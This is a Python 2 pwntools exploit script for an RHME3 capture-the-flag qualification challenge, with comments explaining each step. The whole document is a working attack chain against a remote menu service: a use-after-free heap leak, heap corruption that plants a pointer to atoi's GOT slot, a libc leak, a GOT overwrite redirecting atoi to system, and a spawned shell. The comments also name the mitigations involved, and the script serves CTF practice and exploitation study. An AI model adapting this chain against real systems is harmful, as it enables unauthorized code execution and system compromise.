RHME3 exploit for qualification challenge
# RHME3 qualification-challenge exploit script (pwntools, Python 2 era:
# `print` statements and str/bytes mixing -- it will not run unchanged on
# Python 3).
#
# The script drives a menu-based player-management service over a socket.
# Menu numbering, as far as the prompts and the original comments show:
# 1 = create player, 2 = delete, 3 = select, 4 = edit (sub-option 1 = name),
# 5 and 6 = print/list.  Exact semantics are inferred from the prompts --
# confirm against the binary.
#
# From a defender's point of view the chain has three preconditions, each with
# a known mitigation: a pointer that is still readable after delete (info
# leak; fix the dangling reference), a writable GOT (Full RELRO makes it
# read-only), and a fixed load address (the hard-coded 0x603110 below implies
# a non-PIE binary -- TODO confirm).
from pwn import *
#r = remote('127.0.0.1', 1337)
# Distance from atoi to system in the target's libc; added to the leaked atoi
# address at the end.  Presumably specific to the libc build on the challenge
# host -- verify before reuse.
atoi_system_offset = 58640
r = remote('pwn.rhme.riscure.com', 1337)
# Create player 0
r.recvuntil("Your choice:")
r.send("1\n")
r.send("A" * 0 + "\n")  # empty name
r.send("1\n")  # four numeric fields follow; values here are arbitrary
r.send("2\n")
r.send("3\n")
r.send("4\n")
r.recvuntil("Your choice:")
# Select and delete player 0
r.send("3\n")
r.send("0\n")
r.recvuntil("Your choice:")
r.send("2\n")
r.send("0\n")
r.recvuntil("Your choice:")
# Leak heap address: option 5 still prints data for the deleted player, and
# the first comma-separated decimal field after the second ':' is read as an
# integer.  That this is a heap pointer is what the variable name claims; the
# deleted-then-printed sequence is consistent with a stale (dangling) pointer
# being dereferenced -- inferred, not shown by the script itself.
r.send("5\n")
r.recvuntil("Name:")
r.recvuntil(":")
heap_leak = int(r.recvuntil("\n").split(',')[0])
print "[+] Heap leak:", hex(heap_leak)
r.recvuntil("Your choice:")
# Edit name and linked list corruption: the 8-byte packed heap address is
# written into the name field of the currently selected player.
r.send("4\n")
r.recvuntil("Your choice:")
r.send("1\n")
r.recvuntil("name:")
r.send(p64(heap_leak) + "\n")
r.recvuntil("Your choice:")
r.send("0\n")
r.recvuntil("Your choice:")
# Fake chunk: a new player whose first numeric field is 32.  The original
# comment says this acts as a fake chunk; presumably 32 is read by the
# allocator as a size header -- TODO confirm against the binary's layout.
r.send("1\n")
r.send("A" * 0 + "\n")
r.send("32\n")
r.send("0\n")
r.send("0\n")
r.send("0\n")
r.recvuntil("Your choice:")
# This gets allocated where we control it.  The 253-byte name fills the
# controlled region; the numeric fields are zeroed.
r.send("1\n")
r.send("A" * 253 + "\n")
r.send("0\n")
r.send("0\n")
r.send("0\n")
r.send("0\n")
r.recvuntil("Your choice:")
# Edit the name again: 16 bytes of padding, then the address 0x603110, which
# the original comment identifies as atoi's GOT slot.  This plants a pointer
# where the service later reads a name from.
r.send("4\n")
r.recvuntil("Your choice:")
r.send("1\n")
r.recvuntil("name:")
r.send("B" * 16 + p64(0x603110) + "\n") # atoi GOT
r.send("0\n")
r.recvuntil("Your choice:")
# Option 6 lists players; "Player 1"'s name is now read through the planted
# pointer, so the bytes printed are the contents of the GOT slot.  They are
# newline-stripped, padded to 8 bytes with NULs and unpacked as a little-endian
# address -- the resolved atoi address if the slot really is atoi@GOT.
r.send("6\n")
r.recvuntil("Player 1")
r.recvuntil("Name:")
leak = u64(r.recvuntil("\n").strip().ljust(8, '\x00'))
print "[+] Libc leak:", hex(leak)
r.recvuntil("Your choice:")
# Select player 1 and do write-what-where: editing player 1's name writes
# through the same planted pointer, replacing the GOT entry with
# leak + atoi_system_offset (system, if the offset matches the host's libc).
r.send("3\n")
r.send("1\n")
r.recvuntil("Your choice:")
r.send("4\n")
r.recvuntil("Your choice:")
r.send("1\n")
r.recvuntil("name:")
r.send(p64(leak + atoi_system_offset) + '\n') # Overwrite GOT
# The next menu input is presumably parsed with atoi, whose GOT slot now
# points at system, so "sh" is run as a command -- inferred from the
# comments above.
r.send("sh\n")
print "[+] SHELL"
r.interactive()